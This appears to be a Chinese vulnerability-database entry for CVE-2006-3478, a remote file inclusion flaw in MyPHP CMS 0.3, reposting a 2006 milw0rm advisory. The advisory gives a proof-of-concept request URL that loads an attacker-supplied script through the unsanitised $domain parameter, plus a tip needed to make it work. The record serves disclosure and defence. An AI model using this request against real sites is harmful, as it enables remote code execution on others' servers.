MyPHP CMS 'global_header.php'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110569 漏洞类型 输入验证
发布时间 2006-07-05 更新时间 2006-07-12
CVE编号 CVE-2006-3478 CNNVD-ID CNNVD-200607-123
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1983
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-123
|漏洞详情
MyPHPCMS是基于PHP的开放源码内容管理系统。MyPHPCMS实现上存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。在MyPHPCMS的global_header.php文件中没有正确地检查过滤$domain变量,如果register_globals=on的话,远程攻击者就可以利用简单的PHP代码注入脚本执行任意命令。
|漏洞EXP
---------------------------------------------------------------------------
MyPHP CMS <= 0.3 (domain) Remote File Include Vulnerabilities
---------------------------------------------------------------------------


Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RoSecurityGroup.net :
Remote : Yes
Critical Level : Dangerous

---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : MyPHP CMS
version : latest version [ 0.3 ]
URL : http://sourceforge.net/projects/myphpcms

------------------------------------------------------------------
Exploit:
~~~~~~~

Variable $domain not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.


# http://www.site.com/[path]/styles/default/global_header.php?installed=23&domain=[Evil_Script]

---------------------------------------------------------------------------

Solution :
~~~~~~~~~

declare variabel $domain
---------------------------------------------------------------------------


Shoutz:
~~~~~

# Special greetz to my good friend [Oo]
# To all members of h4cky0u.org ;) and RST [ hTTp://RoSecurityGroup.net ]
---------------------------------------------------------------------------

*/

Contact:
~~~~~~~

Nick: Kw3rLn
E-mail: ciriboflacs[at]YaHoo[dot]Com
Homepage: hTTp://RoSecurityGroup.net
/*

-------------------------------- [ EOF] ----------------------------------

# Further Notes
if ( !isset ( $installed ) )
{
        header ( "Location: install_sql.php" );
}

added installed to the get request for the vulnerability to work correctly.

/str0ke

# milw0rm.com [2006-07-05]
|参考资料

来源:XF
名称:myphp-cms-globalheader-file-include(27538)
链接:http://xforce.iss.net/xforce/xfdb/27538
来源:BID
名称:18834
链接:http://www.securityfocus.com/bid/18834
来源:MILW0RM
名称:1983
链接:http://www.milw0rm.com/exploits/1983
来源:VUPEN
名称:ADV-2006-2679
链接:http://www.frsirt.com/english/advisories/2006/2679
来源:MILW0RM
名称:1983
链接:http://milw0rm.com/exploits/1983